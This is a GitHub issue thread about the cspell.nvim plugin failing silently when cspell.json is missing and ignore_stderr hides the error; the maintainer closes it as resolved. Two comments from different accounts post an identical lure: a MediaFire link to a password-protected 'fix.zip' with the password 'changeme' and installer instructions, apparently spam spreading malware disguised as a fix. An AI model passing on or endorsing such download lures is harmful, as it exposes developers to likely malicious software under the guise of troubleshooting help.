### ISSUE TITLE
missing `cspell.json` and `ignore_stderr` makes it hard to debug

### ISSUE THREAD

**Issue by JeanMertz** [davidmh/cspell.nvim#63]
Not a bug per se, but I was having some issues getting the plugin to work. I used `nvim-lint` before, which worked as expected with `cspell`, but I wanted to use code-actions to whitelist words, so I switched to this plugin.

From using `nvim-lint`, I knew some files had shown lint errors before, but upon switching to this plugin, nothing happened. I had set `debug = true` for `null-ls`, and inspected its logs, and noticed it mentioned that a stderr message was suppressed because of the `ignore_stderr` config.

Only after I explicitly overrode that value using `cspell.diagnostics.with({ .. })` did I get the error message indicating that it could not locale `cspell.json`.

Now that I know this, I can resolve the issue, but the silent failure made me spelunk through the source code for a bit before I realized what was going on.

Since I wasn't using the `codeactions` source _yet_, I would expect the diagnostics source to work out-of-the-box without the need for a `cspell.json` file.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by davidmh** [comment]
Closing since we have addressed the issue with the missing cspell.json files. Please reopen if the problem persists.
